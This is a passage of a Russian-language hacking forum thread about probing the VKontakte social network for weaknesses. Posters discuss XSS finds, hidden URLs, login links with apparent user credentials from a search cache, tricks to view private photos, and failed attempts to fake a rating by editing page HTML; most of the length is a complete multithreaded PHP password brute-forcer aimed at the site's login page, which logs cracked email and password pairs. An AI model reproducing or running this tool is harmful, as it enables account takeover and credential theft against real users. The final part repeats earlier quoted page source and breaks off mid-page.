Нашел толкьо что активную хсс в поиске групп.
А активку в друзьях баг исправили.

Принтскрин:
tgbr.in/def/xss_vkon2.jpg

friendsLookup нет... быстрый поиск закомментирован. Прикрыли уже???

У сайта "однокласники" и "в контакте" одна база даных , думайте
и с чего такие выводы?
если верить этому утверждению, то я могу не региться на одноклассниках и войти с данными контактов?)))
но то, что эти два проекта принадлежат одному и тому же владельцу, очень вероятно :)

2zero_ring
Если нету активного поиска это значит у тебя мало групп. ВВойди в штук 5 минимум должен появится.

Нашел толкьо что активную хсс в поиске групп.
А активку в друзьях баг исправили.

Принтскрин:
tgbr.in/def/xss_vkon2.jpg

1) это пассив
2) никак не воспользоваться
3) я подобных 2шт находил.

2freddi
2)А я говорил что ее можно заюзать?
3)молодец

Нашел толкьо что активную хсс в поиске групп.
А активку в друзьях баг исправили.

Принтскрин:
tgbr.in/def/xss_vkon2.jpg
да пассивка это...

Зацените статейку про "однокласники.ру" накатали
http://www.vz.ru/society/2008/3/26/155083.html

Пошерстил тут вконтакт - наткнулся на пару интересных ссылок:
http://vkontakte.ru/feed2.php
http://vkontakte.ru/infested_ip_list.html

что такое в первой ссылке, кто знает?

Пошерстил тут вконтакт - наткнулся на пару интересных ссылок:
http://vkontakte.ru/feed2.php
http://vkontakte.ru/infested_ip_list.html
что такое в первой ссылке, кто знает?
Прикольно на втором урле мой IP есть :) ну и дальше что, если даже какой нибудь энтузиаст пошлет абуз и абуз дойдет до моего ISP, то он пошлет его дальше на X:\\_

ниасилил выше описанное,но можно как нибудь написать сообщение на закрытую стенку в группе?

http://vkontakte.ru/feed2.php
имхо это статистика новых(!!!) соообщений тебе, видео\фото с тобой и тд....
ничего интересного...

У сайта "однокласники" и "в контакте" одна база даных , думайте

Нифига нет. Я на одноклассниках не зарегестрирован.

Вконтакте - да. Вхожу в одноклассниках(с паролем от контакта) - не входит тебе минус

имхо это статистика новых(!!!) соообщений тебе, видео\фото с тобой и тд....
ничего интересного...
Я в ПХП не силен, но может там переменным что-нибудь поприсваивать ... может что интересное найдется (т.е. что-то типа .../feed2.php?x=2&y=3) :rolleyes:

ниасилил выше описанное,но можно как нибудь написать сообщение на закрытую стенку в группе?
Никак ;)


Собственно еще всякие штуки нашел :rolleyes: :
http://api.vkontakte.ru/api.php
http://vkontakte.ru/upload.php
http://vkontakte.ru/blank.php?code=x (где 0 <= x <= 38)


И еще интресные штуки в кеше гугля нашел :D
http://vkontakte.ru/login.php?email=konyu-mariya%40yandex.ru&pass=zadrot
http://vkontakte.ru/login.php?email=mymail@mail.ru&pass=mypass&expire=0'

Приветствую Всех!
Народ, прикол с женитьбой на самом себе и изменение даты рождения - это конечно весело! Но все же меня интересует более важная тема: рейтинг

Я так подумал - и сделал так:
захожу на мою страницу - где идет строка рейтинга - выбрал - просмотреть исходный текст (opera) -
находим строку <a style='text-decoration:none' href='rate.php
Она отвечает за рейтинг!

У меня написано так: <a style='text-decoration:none' href='rate.php'>
<div id="rate">
<div id="percent">95%</div>
<div class="clearFix">
<div id="rateLeft" style="width:190px">&nbsp;
</div>
<div id="rateRight" style="width:9px">&nbsp;
</div>
</div>
<p></p>


Потом нашел человека с рейтингом 6542:

также делаю просмотр его исходного текста:
<a style='text-decoration:none' href='rate.php?act=vote&id=1004596'>
<div id="rateGold">
<div id="percentGold">6234</div>
<div class="clearFix">
<div id="rateLeftGold" style="width:196px">&nbsp;
</div>
<div id="rateRightGold" style="width:3px">&nbsp;
</div>
</div>
</div></a>
<input type='hidden' id='seed' value='0'>

Целесообразно меняю у себя! На первый раз - показывает мой рейтинг 6542! :)
Но после обновления страницы - возобновляется обратно! У кого какие есть идеи на этот счет!? Как закрепить его!?

Сейчас увидел другую вешь:
если щелкнуть по рейтингу он переходит на страницу: рейтинг (http://vkontakte.ru/rate.php)

Также просматриваю исходный текст:
нахожу -
<!-- pageBody -->

<div id="pageBody" class="pageBody">

<div id="wrapH">
<div id="wrapHI">
<div id="header">
<h1> Статистика</h1>
</div>
</div>
</div>

<div id="wrap2">
<div id="wrap1">
<div id="content">


<div id="rateBar" class="clearFix">
<div id="mainPanel" class="column mainPanel">
<script type="text/javascript">
var progressLine = '<div style="padding:40px 0px 20px 0px;text-align: center"><img valign="middle" src="/images/progress7.gif"></div>';
function getRatePage(page, out) {
var ajax = new Ajax();
ajax.page = page;
ajax.out = out;
ajax.onDone = getPageSuccess;
ajax.onFail = getPageFailed;
ajax.post('/rate.php', {'act': 'a_get_page', 'page': page, 'out': out});
ge('rateContent').innerHTML = progressLine;
}

function getPageSuccess(ajaxObj, responseText) {
try {json=eval("(" + responseText + ")");}
catch(e) {getPageFailed;};
if(json&&json.html) {
ge('rateContent').innerHTML = json.html;
ge('ratePagesTopDiv').innerHTML = json.pages;
ge('ratePagesBottomDiv').innerHTML = json.pages;
if (!ajaxObj.out) {
ge('tabIn').className = "rateTabOn";
ge('tabOut').className = "rateTabOff";
} else {
ge('tabIn').className = "rateTabOff";
ge('tabOut').className = "rateTabOn";
}
}
}

function getPageFailed(ajaxObj, responseText) {
ge('rateContent').innerHTML = "Ошибка сервера.";
}
</script>

<div class="rateHelp">
<div id="rate">
<div id="percent" style="width:100px">95%</div>
<div class="clearFix">
<div id="rateLeft" style="width:380px">&nbsp;</div>
<div id="rateRight" style="width:18px">&nbsp;</div>
</div>
</div>
<div style="padding:4px">
<div style="margin-bottom:3px"><b>Что означает рейтинг страницы?</b></div>
Рейтинг страницы определяет ее порядок при выводе в результатах поиска. Он зависит от рейтинга популярности - количества голосов, которые другие пользователи отдали в пользу автора страницы в знак уважения или симпатии. <a href='rate.php?act=help'>Помощь...</a>
</div>
</div>

<ul class="rateTabs">
<li id="tabIn" class="rateTabOn"><a href='javascript: getRatePage(0, 0)'>Полученные голоса</a></li>
<li id="tabOut" class="rateTabOff"><a href='javascript: getRatePage(0, 1)'>Отданные голоса</a></li>
<li style="float:right;vertical-align:top">
<div id="ratePagesTopDiv">&nbsp;</div>
</li>
</ul>

<div style="clear:both"></div>

<div id="rateRowsWrap">
<div id="rateContent">
<div class="noRate">Пока Вы не получили ни одного голоса.</div>
</div>
<div style="height:26px;">
<div id="ratePagesBottomDiv">
&nbsp;
</div>
</div>
</div>

</div>

<div id="sidePanel" class="column sidePanel">
<div class="rateSideTitle"><b>Ваша страница</b></div>
<div class="rateProfile">
<div><img src="/images/icons/i_photo.gif"> +25% фотография</div><div><img src="/images/icons/i_general.gif"> +10% о себе</div><div><img src="/images/icons/i_contacts.gif"> +10% контакты</div><div><img src="/images/icons/i_schools.gif"> +20% школа</div><div><img src="/images/icons/audio_icon.gif"> +10% увлечения</div><div><img src="/images/icons/event_icon.gif"> +6% места</div><div><img src="/images/icons/i_job.gif"> +10% работа</div><div><img src="/images/icons/i_uni.gif"> +4% вуз</div>
<p class="rateProfileLine">
= 95%
</p>
</div>





</div>
</div>

<div id="boxHolder"></div>

</div>
</div>
</div>

</div>

<!-- End pageBody -->


Кто как думает что здесь нужно исправить чтобы рейтинг изменился!?

А это рейтинг того чувака:
<!-- pageBody -->

<div id="pageBody" class="pageBody">

<div id="wrapH">
<div id="wrapHI">
<div id="header">
<h1> <a href='id1004596'>Алексей Лушников</a> &raquo; Голосование</h1>
</div>
</div>
</div>

<div id="wrap2">
<div id="wrap1">
<div id="content">


<script type="text/javascript">
function showHideInfo() {
if (ge('infoShown').value == 1) {
hide('rateInfo');
ge('infoShown').value = 0;
ge('infoShowLink').innerHTML = 'подробнее...';
} else {
ge('infoShown').value = 1;
show('rateInfo');
ge('infoShowLink').innerHTML = 'скрыть';
}
}
</script>

<div id="msg" style="margin:0px 10px 10px 10px">Вы не можете проголосовать за Алексея, пока не завалидировали ни один голос.</div>

<div class="privacy_panel" style="margin: 0px auto 0px auto; width:480px">
<div class="privacy_panel_editor" style="width:478px">
<div class="privacy_panel_border">
<h2 style="margin:5px 10px">Текущий рейтинг Алексея</h2>
<div class="privacy_panel_settings" style="text-align:left; margin:0px;padding:0px">

<div style="padding:0px 0px 10px 13px">

<div id="rateGold">
<div id="percentGold" style="width:100px">6235</div>
<div class="clearFix">
<div id="rateLeftGold" style="width:398px">&nbsp;
</div>
<div id="rateRightGold" style="width:0px">&nbsp;
</div>
</div>
</div>
</div>

<h2 style="margin: 5px 10px">Что такое рейтинг?</h2>

<div style="margin:10px 17px 10px 20px; line-height: 140%;">
<input type="hidden" id="infoShown" name="infoShown" value="0">
При помощи рейтинга популярности <b>ВКонтакте</b> предоставляет пользователям возможность определять порядок вывода участников при поиске, в списках друзей, в списках участников групп и т.д. <small><a id="infoShowLink" href="javascript: showHideInfo();">подробнее...</a></small><br /><br />

<div id="rateInfo" style="display:none">
<div style="float:left; margin:5px 20px 5px 0px; border:1px solid #DAE1E8"><img src="images/pics/rateSample.gif"></div>

Таким образом, в поиске первыми всегда выводятся активные, уважаемые, популярные и красивые люди.<br /><br />
Если Вы хотите увеличить рейтинг <b>Алексею</b>, выразить ему уважение или симпатию, Вы можете <b>отдать</b> за него голос.<br /><br />
Для того, чтобы избежать спама и накруток, мы просим Вас завалидировать Ваш голос с помощью <b>SMS</b> на номер <b>4444</b> с текстом:
<div style="text-align:center; font-weight: bold; border:1px solid #DAE1E8; width: 200px; padding:5px 0px; margin:10px 10px 10px 142px; background-color:#F6F7F9">id3191437</div>
<b>SMS</b> должна содержать только текст <b>id3191437</b> - и ничего кроме этого. <b>SMS</b> стоит приблизительно <a href='topic2269247'><b>$0.30</b></a> без <b>НДС</b> и на данный момент принимается на территории России, Украины и Казахстана.<br><br>Если Вы хотите проголосовать сразу за <b>10</b> Ваших друзей, Вы можете отправить <b>SMS</b> с точно таким же текстом на номер <b>4449</b> (<a href='topic2269838'>около <b>$3</b></a>).<br /><br />
После отправки <b>SMS</b> в меню в левой части страницы появится уведомление о текущем количестве голосов. Вы сможете проголосовать за любого пользователя <b>ВКонтакте</b>, нажав на его рейтинг.<br /><br />
Уведомление или поздравление от Вас, пример которого приведен выше, будет некоторое время показываться пользователю, после чего будет сохранено в его разделе <b><a href='rate.php'>Статистика</a></b>.<br /><br />
Дополнительную информацию о голосовании и рейтинге можно найти на странице <a href='rate.php?act=help'><b>Статистика: Помощь</b></a>.

</div>
</div>


</div>
</div>
</div>
</div>


<div style="height:35px; padding-bottom:15px;">
<ul class='nNav' style="margin:15px 10px 0px 220px;">
<li style="margin-left:0px">
<b class="nc"><b class="nc1"><b></b></b><b class="nc2"><b></b></b></b>
<span class="ncc"><a href="id1004596">Вернуться к странице Алексея</a></span>
<b class="nc"><b class="nc2"><b></b></b><b class="nc1"><b></b></b></b>
</li>
</ul>
</div>

<div id="boxHolder"></div>

</div>
</div>
</div>

</div>

<!-- End pageBody -->

Попробывал изменить на = <div class="rateHelp">
<div id="rateGold">
<div id="percentGold" style="width:100px">7777</div>
<div class="clearFix">
<div id="rateLeftGold" style="width:380px">&nbsp;</div>
<div id="rateRightGoldt" style="width:18px">&nbsp;</div>
</div> Опять же в первый раз изменяется - а после обновления возвращается обратно! Получается эта инфа хранится где-то в другом месте... У кого есть какие идеи на этот счет!?
</div>

по мне бред какой-то несёшь, твой рейтинг храниться на серваке, и если ты в опере исправил html, и на страничке увидел свой мегабольшой рейтинг- это не значит что на серваке он изменился, т.е. локально изменённое значение нельзя закрепить на серваке....

твой рейтинг храниться на серваке, и если ты в опере исправил html, и на страничке увидел свой мегабольшой рейтинг- это не значит что на серваке он изменился, т.е. локально изменённое значение нельзя закрепить на серваке....
Да, но даже если он хранится на серваке, должна же быть какая-то взаимосвязь с тем что ты делаешь на своей странице - т.е. добавляя друзей, видео и прочую инфу - рейтинг растет - значит он напрямую связан с моей страницей или по крайней мере с данными на странице! = это логически!

Примечание: как по твоему у некоторых людей - у которых как максимум 5 друзей, 1 видео, 1 альбом ну и прочее - в общем страница почти не заполнена - рейтинг около 1000 и того выше!? - следовательно взлом! А как это сделать тогда!? Давайте попробуем вместе логически догнать!? Или можно как нибудь заступорить рейтинг - чтобы он отображался от той инфы - которая указано в кукес!? - вроде понятно объяснил....

Да, но даже если он хранится на серваке, должна же быть какая-то взаимосвязь с тем что ты делаешь на своей странице - т.е. добавляя друзей, видео и прочую инфу - рейтинг растет - значит он напрямую связан с моей страницей или по крайней мере с данными на странице! = это логически!

Примечание: как по твоему у некоторых людей - у которых как максимум 5 друзей, 1 видео, 1 альбом ну и прочее - в общем страница почти не заполнена - рейтинг около 1000 и того выше!? - следовательно взлом! А как это сделать тогда!? Давайте попробуем вместе логически догнать!? Или можно как нибудь заступорить рейтинг - чтобы он отображался от той инфы - которая указано в кукес!? - вроде понятно объяснил....
рейтинг явно берется не из твоей страницы, а из кол-ва данных, которые хранятся для твоего id в базе данных. Также рейтинг поднимается если за тебя шлют смс, либо указывают в настройках как человека из-за которого ты пришел в контакт.

Хм... Значит искусственно поднять нельзя!? И хотите сказать нет никакой дыры - через которое можно это сделать!?

указывают в настройках как человека из-за которого ты пришел в контакт. = а это где!?

AlexV
Ты пишешь в теме таку чушь, что лучше б вообще ничего не писал.

AlexV
Ты пишешь в теме таку чушь, что лучше б вообще ничего не писал.
поностью согласен

Хм... Значит искусственно поднять нельзя!? И хотите сказать нет никакой дыры - через которое можно это сделать!?

= а это где!?
это в "пригласить друзей"
прочитав последние посты, отвечу всем:
через оперу никак нельзя-нет никакой связи между добавлением в базу после отправки смски и скриптом со стороны клиента-нужно просто саму теорию php знать-сначала скрипт обрабатывается на сервере, а только потом страницу видит юзер

измените за банальный вопрос !
но кто-нибуть сканером на баги и уязвимости сканил вконтак .... или просто сервер на котором он лежит ?
вот я скажу честно не пробовал потому что меня напрягают слухи про Ф з Б !!! если кто сканил поделитесь опытом что вышло ))

разсмотрим..)


#!/usr/bin/php
<?
$mail = "zell@smtp.ru"; // that's mail for brute
define(_dictf,"words.txt"); // file where placed passwords (splited by \r\n)
define(_logfile,"log.txt"); // file to dump results
define(_queue,100); // how mutch thread's start? (for me best results on 200<= threads...)
define(_sock_test_,true); // posible lagging test ( on bad line's ) ;/
/*
define(_proxy_use_)
define(_proxy_host_)
define(_proxy_port_)
define(_proxy_type_)
define(_proxy_login_)
define(_proxy_passw_)
$stat = new statistic(); // not curently realeased (todo)*/
define(_loghead,
"[-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-]\r\n
[.................................................. ..............................................]\r\n
[.................................................. ..............................................]\r\n
[.................................................. ..............................................]\r\n
[.................................................. ..............................................]\r\n
[.................................................. ............].................................]\r\n
[.................................................. ..............................................]\r\n
[.................................................. ..............................................]\r\n
[.................................................. ..............................................]\r\n
[.................................................. ..............................................]\r\n
[.................................................. ..............................................]\r\n
[-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-]\r\n
_.-x={[Started in ".$stat->start." by unix time...]}=x-._
\r\n\r\n
[-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-]\r\n");




class queue
{
var $_mail;
var $pases;
var $ipass;
var $result;
var $result_i;
var $return;
var $trouble;
var $nbug;

function queue($mail,$pass)
{
$this -> result_i = 0;
$this -> debug_i = 0;
$this -> count_result;
$this -> _mail = $mail;
$this -> pases = $pass;
$this -> ipass = $pass;
}

function getback()
{
return $this -> result;
}

function init()
{
// echo "init()::";
while($this -> getqueue() == true)
{
// echo "Restarting...\r\n";
};
}

function getqueue()
{
// echo "getqueue()::";
list ($return,$trouble,$nbug) = $this -> combine($this -> _mail,$this -> ipass);
$resu = $this -> result_i + count($return);
for ($i = $this -> result_i; $i < $resu; $i++)
{
$this -> result[$i] = $return[$i];
};
if ($trouble)
{

$this -> debug[$this -> debug_i] = "Found trouble.. try to do something...";
$this -> debug_i ++;
for ($a = 0 ; $a < count($nbug); $a++)
{
$ipass[$a] = $nbug[$a];
};
// echo "Rotating...";
};
$this -> nbug = $nbug;
return ($trouble);
}

function c_h($mail,$pass)
{
$ch = curl_init("http://vkontakte.ru/login.php?email=".$mail."&pass=".$pass);
if ($ch)
{
curl_setopt($ch ,CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)');
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
curl_setopt($ch, CURLOPT_OPERATIONTIMEOUT, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST,"HEAD");
curl_setopt($ch, CURLOPT_MUTE, true);
};
return $ch;
}


function combine($mail,$pass)
{
$count = count($pass);
$mh = curl_multi_init();
$trouble = false;
$trouble_i = 0;
for ($i = 0; $i < $count; $i++)
{
$conn[$i] = $this -> c_h($mail,$pass[$i]);
curl_multi_add_handle ($mh,$conn[$i]);
}

do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);

while ($active and $mrc == CURLM_OK) {
// wait for network
if (curl_multi_select($mh) != -1) {
// pull in any new data, or at least handle timeouts
do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}
}

if ($mrc != CURLM_OK) {
print "Curl multi read error $mrc\n";
}

// retrieve data
for ($i = 0 ; $i < $count; $i++)
{
if (($err = curl_error($conn[$i])) == '') {
$ret[$i]=curl_multi_getcontent($conn[$i]);
} else {
// echo curl_error($conn[$i])."\r\n";
$trouble = true;
$bug = array ($i, curl_error($conn[$i]));
$nbug[$trouble_i] = $bug;
$trouble_i++;
$this -> debug[$this -> debug_i] = "Connection trouble while try: [".$pass[$i]."] trouble is [".curl_error($conn[$i])."]";
$this -> debug_i++;
}
curl_multi_remove_handle($mh,$conn[$i]);
};
@curl_close($conn[$i]);
curl_multi_close($mh);

return array($ret,$trouble,$nbug);
}

};


class statistic
{
var $start;
function statistic()
{
$this -> start = date("U");
}
function stop()
{
$now = date("U");
$now = $now - $this -> start;
return $now;
}
};
$stat = new statistic();

class found
{
var $_mail;
var $pass;
var $id;
var $all;
var $hash;
var $fp;

function found()
{}
function init()
{
$this -> all = 0;
$this -> fp = fopen(_logfile,"w");
fputs($this->fp,_loghead);
}
function show()
{
for ($i = 0; $i < $this -> all; $i++)
{
$var = "--[ ".$i." ]--------------------------------------------------------------\r\n"
. "[|] Email : " . $this->_mail[$i]."\r\n"
. "[|] Passwd : " . $this-> pass[$i]."\r\n"
. "[|] UsrID : " . $this->id[$i]."\r\n"
. "[!] md5hash: " . $this->hash[$i]."\r\n"
. "[+]------------------------------------------------------------------\r\n\r\n";

echo $var;
fputs($this -> fp,$var);
};
}
function add($mail,$pass,$id)
{
$this -> _mail[$this -> all] = $mail;
$this -> pass[$this -> all] = $pass;
$this -> id[$this -> all] = $id;
$this -> hash[$this -> all] = md5($pass);
$this -> all++;
}
};
class statusbar
{
var $onepercent;
function statusbar($full)
{
$this -> onepercent = ( $full / 100);
}

function show($num,$found)
{
// system('clear');
$perc = $num / $this -> onepercent;
$now = "\r[_".round($perc)."%_] [".$found." Founded] [Complete... i'm running...]";
echo $now;
}
};
class parser
{
var $answer;
var $http_answ;
var $found;
var $id;

function parser($answer)
{
$this -> found = false;
$this -> answer = $answer;
$arr = explode("\r\n",$this -> answer);

$this -> http_answ = $arr["0"];
for ($i = 0; $i < count($arr); $i++)
{
if (eregi("Cookie",$arr[$i]))
{
$mycookie = explode(" ",$arr[$i]);
$temp0 = explode("=",$mycookie[1]);
if ($temp0["0"] == "remixmid")
{
$this -> id = eregi_replace(";","",$temp0["1"]);
if ($this -> id != "deleted")
{
$this -> found = true;
};
}

}else{
// $arrs = explode(": ",$arr[$i]);
// var_dump($arrs);
// тут мы можем проверить наличие Location в ответе... воможно будет быстрее чем вышеописаное
}
};
}
};




function do_scan($mail,$obj)
{

$dictf = fopen(_dictf,"r");
while(!feof($dictf)) {$buff = $buff . fread($dictf,4096);};

$pass = explode("\n",$buff);
$bar = new statusbar(count($pass));

for ($word = 0; $word < count($pass); $word++)
{
$bar -> show($word,$obj -> all);
$a = 0;
for ($a = 0 ; $a < _queue; $a++)
{
// echo "$argc[$a] = $pass[$a] \r\n";
$argc[$a] = $pass[$word];
// echo "pass2queue:: [ ".$argc[$a] ." is ".$word." word ]\r\n";
$word++;
};
$bob = new queue ($mail, $argc);
$bar -> show($word,$obj -> all);
$bob -> init();
$array = $bob -> getback();

$c = 0;
for ($c = 0; $c < count ($array) ; $c++)
{
// var_dump($array[$c]); вывести возврат от курла
$f = new parser($array[$c]);
if ($f -> found)
{
$obj -> add($mail,$argc[$c],$f -> id);
};
};

/*
$me = new req($mail,$pass[$word]);
if ($me -> found)
{
$obj -> add ($me -> login, $me -> pass, $me -> id);
};
*/
};
return $obj;
};

function test()
{
echo "[ Prestart testing... ] Resolving www.vkontakte.ru...";
if(!@gethostbyname("www.vkontakte.ru")) { echo "[ Error ]\r\n";exit(); };
echo "[ Ok ]\r\n";
echo "[ Prestart testing... ] Resolving vkontakte.ru...";
if(!@gethostbyname("vkontakte.ru")) { echo "[ Error ]\r\n"; exit(); };
echo "[ Ok ]\r\n";
echo "[ Testing network.... ] (by sockopen())...";
if(!@fsockopen("vkontakte.ru",80)) { echo "[ Error ]\r\n"; exit();};
echo "[ Ok ]\r\n";
echo "[ Testing curl...] ...";
if (!function_exists("curl_init")) { echo "[ Error ]\r\nTry install curl support visit php.net for more information..."; exit();};
echo "[ Ok ]\r\n";
echo "[ Testing curl version... ] ...";
if (!function_exists("curl_multi_exec")) { echo "[ Error ]\r\nTry install newest curl version for more support visit php.net for more information...\r\nCannot run multi thread, exiting...\r\n"; exit();};
echo "[ Ok ]\r\n";
echo "[ All looks like on my linux box... pretty good ;] ]\r\n[ so let's try hack that motherfucker...]\r\n";
echo "[ Testing wordlist file for open ] With fopen() ...";
if (!fopen(_dictf,"r")) { echo "[ Error ]\r\n"; exit(); };
echo "[ Ok ]\r\n";
echo "[ Testing fopen() for write log...] ...";
if (!fopen(_logfile,"w")) { echo "[ Error ]\r\n"; exit(); };
echo "[ Ok ]\r\n";
};

test();
$obj = new found();
$obj -> init();
$obj = do_scan($mail,$obj);
echo "\r\n";
$obj -> show();
?>

http://www.navstreche.com/ еще 1 сайтик , очен напоминает контакт

mazaxaka сдесь скорее всего снят шаблон хтмл нежели сам двиг...

http://www.navstreche.com/ еще 1 сайтик , очен напоминает контакт
это просто сайт, сделанный наподобие вконтакте, но реально очень похоже
мне очень понравились пароль если забыли код активации если не получили :DDDD

to sabe

а копирайты не хорошо убирать...
зы сорь если ты и есть zell :D

sabe, а что это, брут? :rolleyes:

WhistleR да

__mad
так вышло..)

WhistleR
да.. это поидее private брут..
и там нужна библиотека курл..

Ребят, появилась такая идея - раз navstreche - это скорей всего копия html контакта - то скорей всего он менее защищен и более прост для взламываний?! - или же я не правильно мыслю!? Может стоит открыть тему по этому вопросу - и попробывать найти баги и дырки!?

Ребят, появилась такая идея - раз navstreche - это скорей всего копия html контакта - то скорей всего он менее защищен и более прост для взламываний?! - или же я не правильно мыслю!? Может стоит открыть тему по этому вопросу - и попробывать найти баги и дырки!?
Опять чушь :) Тут главное не ХТМЛ, а ПХП код, который работает на сервере с базой данных. А то что это точная копия вконтакта - оооочень мало вероятно, да и, я думаю, если в код заглянуть в этом можно убедиться. Так что найденные баги в навстрече переносить на вконтакт смысла не имеет :rolleyes:

ReVOLVeR, sabe, кто-нибудь его пробовал, чем-то отличается? Потому что на том максимум в 4 потока шпарит (если больше - не успевает ответы от сервера получать, имхо).
Библиотечка вот эта: _http://ru2.php.net/manual/ru/ref.curl.php ? Зачем она и почему в другом бруте не используется? :) А то я в ПХП не очень рублю :rolleyes:

Вконтакт хранит информацию удалённых пользователей!! все фото, видео и тд. это 100% база фсб
завтра напишу поподробнее. щас уже засыпаю.

там же вроде после удаления восстановиться можется, потому и не удаляется инфа, и через id так же можно обратиться, photos.php?id= wall.php?id= etc

Вот подробнее:
http://vkontakte.ru/friend.php?act=&id=*****
друзья.
http://vkontakte.ru/photos.php?act=user&id=*****
некоторые фотки.
http://vkontakte.ru/video.php?act=tagview&id=***** или http://vkontakte.ru/video.php?id=*****
видео.

стену посмотреть неудаёться. аналогично можно посмотреть музыку и тд....

Вконтакт хранит информацию удалённых пользователей!! все фото, видео и тд. это 100% база фсб
завтра напишу поподробнее. щас уже засыпаю.
Какая база!? Какое ФСБ. Ненаводи панику! А свои домыслы про ФСБ оставьте при себе.
Вконтакте - коммерческий проект, не более того.

в общем мною обнаружено два небольших бага.
1)У вашего друга вконтакте есть друг который не добавлен в вашем списке друзей.Ваш друг кидает вам фотку из его альбома,но вот незадача,у вас написано что фота защищена настройками приватности. Для этого есть один замечательный способ,просите друга чтобы он отметил вас на той фоте и все,теперь вы имеете право просмотреть эту фоту!
2)Второй способ это способ побалываться с фотками. Допустим ваш друг отметил когото на фотке(естественно того кто и в вашем списке друзей,иначе несработает!)вы берете и нажимаете на"отметить человека"и отмечаете того кто уже на ней отмечен. жмете на "готово" и теперь вы вправе либо оставить(но если вы хотите сделать гадость то лучше поступить вторым способом)либо удалить человека с этой фоты.точно также можно и с хозяином фотоальбома поступить=)
Надеюсь до меня их никто еще ненаходил.
Cweur(c)

2-е наплохо )))

Всем привет! У меня такая проблема - мой аккаунт - забанили на ВК - почему - не в курсе! :) Узнал - написав от девушки (мой бот) - в администрацию! Кто знает как можно себя разбанить или поступить в данном случае - подскажите пожалуйста!

люди , может ктото подскажет а то я не знаю что делать какая то борода с вконтактом
короче на мой запрос по восстановлению пароля приходит вот такое " 1306штеут╕у1965" , но пас другой я уверен , но пас вспомнить не могу , и в имени когда обращаются вместо "s†!ф " обращаются как "s.!ф " что за фигня ?

А теперь все это читает Павел дуров))) и все залатывает

Какая база!? Какое ФСБ. Ненаводи панику! А свои домыслы про ФСБ оставьте при себе.
Вконтакте - коммерческий проект, не более того.

Чото мне этот стиль разговора не нравится или он мне штото напоминает

Сейчас увидел другую вешь:
если щелкнуть по рейтингу он переходит на страницу: рейтинг (http://vkontakte.ru/rate.php)

Также просматриваю исходный текст:
нахожу -
<!-- pageBody -->

<div id="pageBody" class="pageBody">

<div id="wrapH">
<div id="wrapHI">
<div id="header">
<h1> Статистика</h1>
</div>
</div>
</div>

<div id="wrap2">
<div id="wrap1">
<div id="content">


<div id="rateBar" class="clearFix">
<div id="mainPanel" class="column mainPanel">
<script type="text/javascript">
var progressLine = '<div style="padding:40px 0px 20px 0px;text-align: center"><img valign="middle" src="/images/progress7.gif"></div>';
function getRatePage(page, out) {
var ajax = new Ajax();
ajax.page = page;
ajax.out = out;
ajax.onDone = getPageSuccess;
ajax.onFail = getPageFailed;
ajax.post('/rate.php', {'act': 'a_get_page', 'page': page, 'out': out});
ge('rateContent').innerHTML = progressLine;
}

function getPageSuccess(ajaxObj, responseText) {
try {json=eval("(" + responseText + ")");}
catch(e) {getPageFailed;};
if(json&&json.html) {
ge('rateContent').innerHTML = json.html;
ge('ratePagesTopDiv').innerHTML = json.pages;
ge('ratePagesBottomDiv').innerHTML = json.pages;
if (!ajaxObj.out) {
ge('tabIn').className = "rateTabOn";
ge('tabOut').className = "rateTabOff";
} else {
ge('tabIn').className = "rateTabOff";
ge('tabOut').className = "rateTabOn";
}
}
}

function getPageFailed(ajaxObj, responseText) {
ge('rateContent').innerHTML = "Ошибка сервера.";
}
</script>

<div class="rateHelp">
<div id="rate">
<div id="percent" style="width:100px">95%</div>
<div class="clearFix">
<div id="rateLeft" style="width:380px">&nbsp;</div>
<div id="rateRight" style="width:18px">&nbsp;</div>
</div>
</div>
<div style="padding:4px">
<div style="margin-bottom:3px"><b>Что означает рейтинг страницы?</b></div>
Рейтинг страницы определяет ее порядок при выводе в результатах поиска. Он зависит от рейтинга популярности - количества голосов, которые другие пользователи отдали в пользу автора страницы в знак уважения или симпатии. <a href='rate.php?act=help'>Помощь...</a>
</div>
</div>

<ul class="rateTabs">
<li id="tabIn" class="rateTabOn"><a href='javascript: getRatePage(0, 0)'>Полученные голоса</a></li>
<li id="tabOut" class="rateTabOff"><a href='javascript: getRatePage(0, 1)'>Отданные голоса</a></li>
<li style="float:right;vertical-align:top">
<div id="ratePagesTopDiv">&nbsp;</div>
</li>
</ul>

<div style="clear:both"></div>

<div id="rateRowsWrap">
<div id="rateContent">
<div class="noRate">Пока Вы не получили ни одного голоса.</div>
</div>
<div style="height:26px;">
<div id="ratePagesBottomDiv">
&nbsp;
</div>
</div>
</div>

</div>

<div id="sidePanel" class="column sidePanel">
<div class="rateSideTitle"><b>Ваша страница</b></div>
<div class="rateProfile">
<div><img src="/images/icons/i_photo.gif"> +25% фотография</div><div><img src="/images/icons/i_general.gif"> +10% о себе</div><div><img src="/images/icons/i_contacts.gif"> +10% контакты</div><div><img src="/images/icons/i_schools.gif"> +20% школа</div><div><img src="/images/icons/audio_icon.gif"> +10% увлечения</div><div><img src="/images/icons/event_icon.gif"> +6% места</div><div><img src="/images/icons/i_job.gif"> +10% работа</div><div><img src="/images/icons/i_uni.gif"> +4% вуз</div>
<p class="rateProfileLine">
= 95%
</p>
</div>





</div>
</div>

<div id="boxHolder"></div>

</div>
</div>
</div>

</div>

<!-- End pageBody -->


Кто как думает что здесь нужно исправить чтобы рейтинг изменился!?

А это рейтинг того чувака:
<!-- pageBody -->

<div id="pageBody" class="pageBody">

<div id="wrapH">
<div id="wrapHI">
<div id="header">
<h1> <a href='id1004596'>Алексей Лушников</a> &raquo; Голосование</h1>
</div>
</div>
</div>

<div id="wrap2">
<div id="wrap1">
<div id="content">

